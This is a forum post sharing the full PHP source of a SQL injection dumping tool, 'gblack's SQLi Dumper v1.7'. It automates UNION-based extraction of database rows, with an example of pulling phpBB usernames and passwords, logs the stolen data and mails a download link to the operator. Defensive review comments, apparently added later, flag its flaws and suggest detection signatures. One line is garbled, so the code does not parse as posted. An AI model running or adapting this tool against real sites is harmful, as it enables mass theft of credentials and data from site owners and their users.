gblack's SQLi Dumper v1.7
Posted: Wed Dec 16, 2009 1:08 am
<?php
/*********************************************************************
* I write this script because there was many SQLi Dumper script that *
* wont work when im trying to dump data from a SQLi bug of some site *
* which is has a good sec (i dont know what the sec) but in fact the *
* sec sh*t always ban my IP addr once i have dumped the data in line *
* 3000 or so. I thought that is an Anti-DDoS or something.. So why i *
* could dump with this script? Because i use file_get_contents and i *
* hope you understand what i mean by file_get_contents function in *
* PHP instead of using LWP::UserAgent in Perl or somethin in Python. *
* *
* Script name : gblack's SQLi Dumper (sqlidumper.php) *
* Info : Inspired from SSDp by Vrs-hCk *
* Version : 1.7 *
* Coded with : Notepad++ v5.4.5 (UNICODE) *
* Coder : gblack a.k.a biadabz *
* Contact : the_rumput_segar[at]yahoo.co.id (IM Only) *
* Thxz & greetz : Jack XShadow inc0mp13te b10 mywisdom Vrs-hCk *
* blackincyber(for the bug report) Vires *
* XCode MainHack ServerISdowN NetHeroes darkc0de *
* *
* /gblack- *
*********************************************************************/
/* CONFIGURATION START */
// Operator settings for the run. When $email_reporting is on, the script mails a
// link to the finished dump file to $report_to (see the mail() call near the end).
$email_reporting = 1; // Need mail() function enabled server; 1 = enable this feature; 0 = disable this feature
$report_to = "[email protected]"; // Separate with comma (,) for multiple box; Example: "[email protected],[email protected]"
$verbose = 0; // 1 = Print output to the browser; 0 = Do not print output to the browser (Recommended for big data dumping, just close the browser ;))
/* EOF CONFIGURATION */
// Suppress all PHP error output, so failures leave nothing on the page.
error_reporting(0);
// Remove the execution time limit and keep running after the client disconnects.
// On the hosting server this appears as a long-lived PHP worker that keeps making
// outbound HTTP requests with no client attached, which is worth alerting on.
set_time_limit(0);
ignore_user_abort(true);
// Download handler: when the request carries a `dump` query parameter, the named
// file is sent to the client as a plain-text attachment and then deleted.
//
// NOTE(review): nothing here authenticates the caller or confines the path to a
// directory. The request value goes straight to file_exists(), readfile() and
// unlink(); the only filter is the "--." split below. Any visitor who can reach
// the script can therefore fetch and remove a matching file.
// For incident response: the dump file is gone after its first download, so the
// web-server access log entries containing `?dump=` are the remaining record of
// which dumps existed and who retrieved them.
if(isset($_GET['dump'])) {
$file = $_GET['dump'];
// Split on the literal "--." so that element 1 holds whatever follows the first
// occurrence; log files written later in this script end in "--.txt".
$allow = explode("--.", $file);
$self = $_SERVER['SCRIPT_NAME'];
if((!$file) || ($allow[1] <> "txt") || (!file_exists($file))){ // Only .txt file allowed & bug patch => downloading self when the 'dump' is empty: '/sqlidumper.php?dump='
print "<script>alert('Not allowed!');</script>";
// $self is interpolated into the markup without HTML escaping.
print "<meta HTTP-Equiv='refresh' content='0; URL=$self'>";
exit;
}
header("Content-type: text/plain");
// The request-supplied name is concatenated into the header unquoted.
header("Content-Disposition: attachment; filename=".$file);
readfile($file);
// One-shot download: the file is deleted as soon as it has been sent.
unlink($file);
exit;
}
?>
<html>
<head>
<style type="text/css">
body {
background-color: #000;
font-family: Courier New;
font-size: 12px;
color: #00FF00;
}
.textbox {
margin:1px;
border: #00FF00 1px solid;
font-size: 12px;
font-family: Courier New;
color: #00FF00;
background-color: #000;
}
#readme {
border: 1px solid #00FF00;
margin:3px;
padding: 2px;
width: 700;
background-color: #111;
}
#main {
border: 1px solid #00FF00;
margin:3px;
padding: 2px;
width: 700;
background-color: #111;
}
#readme {
display:none;
}
#res {
border: 1px solid #00FF00;
margin:3px;
padding: 2px;
width: 700;
background-color: #111;
}
#loading {
border: 1px solid #00FF00;
margin:3px;
padding: 2px;
width: 700;
}
a:link { color:#00FF00;}
a:hover { color:#00FF00;}
</style>
<script type="text/javascript" language="JavaScript">
// Hide the element with the given id by setting its inline display to "none".
function HideContent(d) {
    var node = document.getElementById(d);
    node.style.display = "none";
}
// Show the element with the given id by setting its inline display to "block".
function ShowContent(d) {
    var node = document.getElementById(d);
    node.style.display = "block";
}
// Toggle the element with the given id: an inline display of "none" becomes
// "block", and any other value becomes "none".
function ReverseDisplay(d) {
    var style = document.getElementById(d).style;
    style.display = (style.display == "none") ? "block" : "none";
}
</script>
</head>
<title> gblack's SQLi Dumper</title>
<body onload="HideContent('readme');HideContent('loading');">
<center>
[ <a href="javascript:ReverseDisplay('readme');"><b> gblack's SQLi Dumper<b></a> ]
<div id="readme" align="left">
Readme:<br>
- SQLi URL: You must include 'gblack' string in 1 of the visible column(s) (magic number)<br>
- End tag: You may use '--' or '/*' for this, depend on the error type<br>
- Database: You may not fill this field if you want to dump the data from default database<br>
- Table: This is the table where the coulmn(s) of the data will be dumped from<br>
- Column(s): This is the column(s) where the data will be dumped from<br>
<br>Usage example:<br>
- SQLi URL: http://www.target.com/index.php?id=1+union+all+select+1,gblack,3,4<br>
- End tag: --<br>
- Database: phpbb_forum<br>
- Table: phpbb_users<br>
- Column(s): username,password<br>
<br>Thxz & greetz goes to:<br>Jack XShadow inc0mp13te b10 mywisdom Vrs-hCk blackincyber Vires<br>
</div>
<div id="main" align="left">
<form action="" method="post"><br>
SQLi URL: 
<input name="url" class="textbox" type="text" value="" size="88"/><br>
End tag:   <input name="evasion" class="textbox" type="text" value="" size="5"/>
    Database:<input name="database" class="textbox" type="text" value="" size="20"/>
    Table:<input name="table" class="textbox" type="text" value="" size="20"/><br>
Column(s): <input name="column" class="textbox" type="text" value="" size="88"/><br>
<input name="query" class="textbox" value="Dump now!" type="submit" onClick="javascript:ShowContent('loading');HideContent('readme');">
</form>
</div>
<div id='loading' style="display:none;"><img src='http://www.techbd.com/images/loading.gif'></div>
<div id='res' align='left'>
<?php
// Form handler. Takes a URL plus database/table/column names from the POST body,
// rewrites the URL, fetches it repeatedly from the hosting server, and appends
// every marker-delimited value found in the responses to a log file.
//
// Review notes for defenders (each follows from the statements below):
// - Every request-supplied value is used unvalidated: in the fetched URL, in the
//   log file name, and in the HTML printed back to the browser.
// - The page has no access control, so anyone who can reach it can make the
//   hosting server fetch a URL of their choosing. The presence of this file, or
//   of "*--.txt" files beside it, on a web server should be treated as an
//   indicator of compromise or abuse.
// - On the requested site, the traffic is a run of near-identical GET requests
//   from the hosting server's address. They differ only in the LIMIT offset and
//   each carries the hex literal 0x67626C61636B twice inside UNHEX(HEX(CONCAT(...))).
//   That literal and the offset pattern are usable as log/WAF signatures. The
//   underlying fix on the requested site is parameterised queries.
if (isset($_POST['query'])) {
$tempik = trim($_POST['evasion']);
$sqli = trim($_POST['url']);
$db = trim($_POST['database']);
$table_name = trim($_POST['table']);
$column_name = trim($_POST['column']);
// Token separator: "+" when the supplied URL already contains "+UNION+",
// otherwise an SQL comment ("/**/").
if (preg_match("/\+UNION\+/i", $sqli)){
$spasi = "+";
} else {
$spasi = "/**/";
}
// Database is the only optional field.
if(!$sqli || !$tempik || !$table_name || !$column_name) {
print "<font color='red'>[!] Error: Please complete all required fields!</font>";
exit;
}
$tgl_lahir = date("d-m-Y");
// Strip the scheme so the host can be taken as the first "/"-separated part.
if(preg_match("/https/i", $sqli)) {
$sitename = str_replace("https://", "", $sqli);
} else {
$sitename = str_replace("http://", "", $sqli);
}
$waktustart = date("h:i:s");
$namafl = explode("/", $sitename);
// Log file name: host, database, table, columns and date, ending in "--.txt".
// It is a relative name built from request values with no sanitising.
// NOTE(review): presumably the file lands in the script's working directory, which
// would make it web-reachable - confirm on the host under investigation.
$logz = $namafl[0]."_".$db."_".$table_name."_".str_replace(",", "-", $column_name)."_".$tgl_lahir."--.txt";
// 0x67626C61636B is the hex encoding of the ASCII string "gblack"; it delimits
// the value of interest in the response body.
$by = "0x67626C61636B";
$mbut = "UNHEX(HEX(CONCAT(".$by.",COUNT(*),".$by.")))";
// The literal "gblack" in the supplied URL is swapped for the COUNT(*) expression.
$matamu = str_replace("gblack", $mbut, $sqli);
$picek = $matamu.$spasi."FROM".$spasi.$db.".".$table_name.$tempik;
// `!$db <> ""` is true when $db is empty: drop the "db." qualifier in that case.
if(!$db <> "") {
$picek = $matamu.$spasi."FROM".$spasi.$table_name.$tempik;
}
print "[+] Attempting to connect to $namafl[0] on port 80 ... <br>";
flush();ob_flush();
// Reachability check only: the socket is tested for success here and is not
// used again or closed in this block.
$konak = fsockopen($namafl[0], 80);
if (!$konak) {
print "<font color='red'>[!] Error: Failed to connect to $namafl[0]<br></font>";
exit;
} else {
print "[+] Connected to $namafl[0]<br><br>";
}
// Server-side fetch of a request-derived URL; "@" hides any warning.
$hooh = @file_get_contents($picek);
// The text between the two markers is taken as the row count.
if (preg_match("/gblack(.*?)gblack/i", $hooh, $iyo)) {
$logging = fopen($logz, "a+");
fwrite($logging, "==============================================================================================\r\n");
fwrite($logging, "| SQLi Dumper v1.7 |\r\n");
fwrite($logging, "| Coded © 2009 By gblack |\r\n");
fwrite($logging, "| the_rumput_segar[at]yahoo.co.id (IM Only) |\r\n");
fwrite($logging, "| |\r\n");
fwrite($logging, "| amit-amit Security! |\r\n");
fwrite($logging, "==============================================================================================\r\n\r\n");
fwrite($logging, "[+] SQLi URL: ".$sqli."\r\n");
fwrite($logging, "[+] Evasion used: \"".$spasi."\" and \"".$tempik."\"\r\n");
fwrite($logging, "[+] Database: ".$db."\r\n");
fwrite($logging, "[+] Table name: ".$table_name."\r\n");
fwrite($logging, "[+] Column(s) name: ".$column_name."\r\n");
// The same request values are echoed into the page without HTML escaping.
print "[+] SQLi URL: ".$sqli."<br>";
print "[+] Evasion used: \"".$spasi."\" and \"".$tempik."\"<br>";
print "[+] Database: ".$db."<br>";
print "[+] Table name: ".$table_name."<br>";
print "[+] Column(s) name: ".$column_name."<br>";
flush();ob_flush();
$limit = $iyo[1];
fwrite($logging, "[+] There are ".$limit." entries to be extracted.\r\n\r\n");
print "[+] There are ".$limit." entries to be extracted.<br><br>";
} else {
print "<font color='red'>[!] Error: Could not get limit!</font>";
print "<script>HideContent('loading');</script>";
exit;
}
// NOTE(review): the next two lines are reproduced exactly as posted; the variable
// name contains spaces, so this listing does not parse as PHP.
$Forum Yogyafree Keren Yach = "UNHEX(HEX(CONCAT(".$by.",CONCAT_WS(0x3a,$column_name),".$by.")))";
$xonthol = str_replace("gblack", $Forum Yogyafree Keren Yach, $sqli);
print "[+] Dumping data started at ".$waktustart." ".$tgl_lahir." ...<br><br>";
fwrite($logging, "[+] Dumping data started at ".$waktustart." ...\r\n\r\n");
// One outbound request per iteration, for offsets 0 through $limit inclusive.
// $limit comes from the remote response and is not checked to be numeric.
for($id=0;$id<=$limit;$id++) {
$anak_ke = $id+1;
flush();ob_flush();
$kenthu = $xonthol.$spasi."FROM".$spasi.$db.".".$table_name.$spasi."LIMIT".$spasi.$id.",1".$tempik;
if(!$db <> "") {
$kenthu = $xonthol.$spasi."FROM".$spasi.$table_name.$spasi."LIMIT".$spasi.$id.",1".$tempik;
}
$hamil = @file_get_contents($kenthu);
// Responses without both markers are skipped silently.
if (preg_match("/gblack(.*?)gblack/i", $hamil, $kembar)){
fwrite($logging, "[".$anak_ke."] ".$kembar[1]."\r\n");
if($verbose) {
// Remote response content is printed into the page unescaped.
print "[".$anak_ke."] ".$kembar[1]."<br>";
print "<script>ShowContent('loading');</script>";
} elseif(!$verbose) {
print "<script>ShowContent('loading');</script>";
}
}
}
$waktufinish = date("h:i:s");
$tgl_mati = date("d-m-Y");
print "<br>[+] Dumping data finished at ".$waktufinish." ".$tgl_mati;
fwrite($logging, "\r\n[+] Dumping data finished at ".$waktufinish." ".$tgl_mati."\r\n\r\n");
fclose($logging);
// Link back to this script's `dump` handler for the file just written.
print "<br>[+] <a href='?dump=$logz'>Click here to download the log file!</a>";
print "<script>HideContent('loading');</script>";
// Optional report: mails the download URL (built from the Host header and script
// path) to the configured address. Outbound mail from the web server with a
// "Dump - " subject is another artefact to look for on the hosting side.
if($email_reporting) {
$to = $report_to;
$subject = 'Dump - '.$logz;
$message = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."?dump=".$logz;
$headers = 'From: Dumper Log<[email protected]>' . "\r\n" . 'X-Mailer: PHP/' . phpversion();
if(mail($to, $subject, $message, $headers) == false) {
print "<font color='red'><br>[!] Error: Could not send email report!";
} else {
print "<br>[+] Email report sent!";
}
}
}
?>
</div>
</center>
</body>
</html>
http://ngaceng-a.biz/sqlidumper.txt
**wogh!** :omg:
Ditunggu comment na gan!! :malumalu:
Brb dl... Ngisi ilmu... :tapa: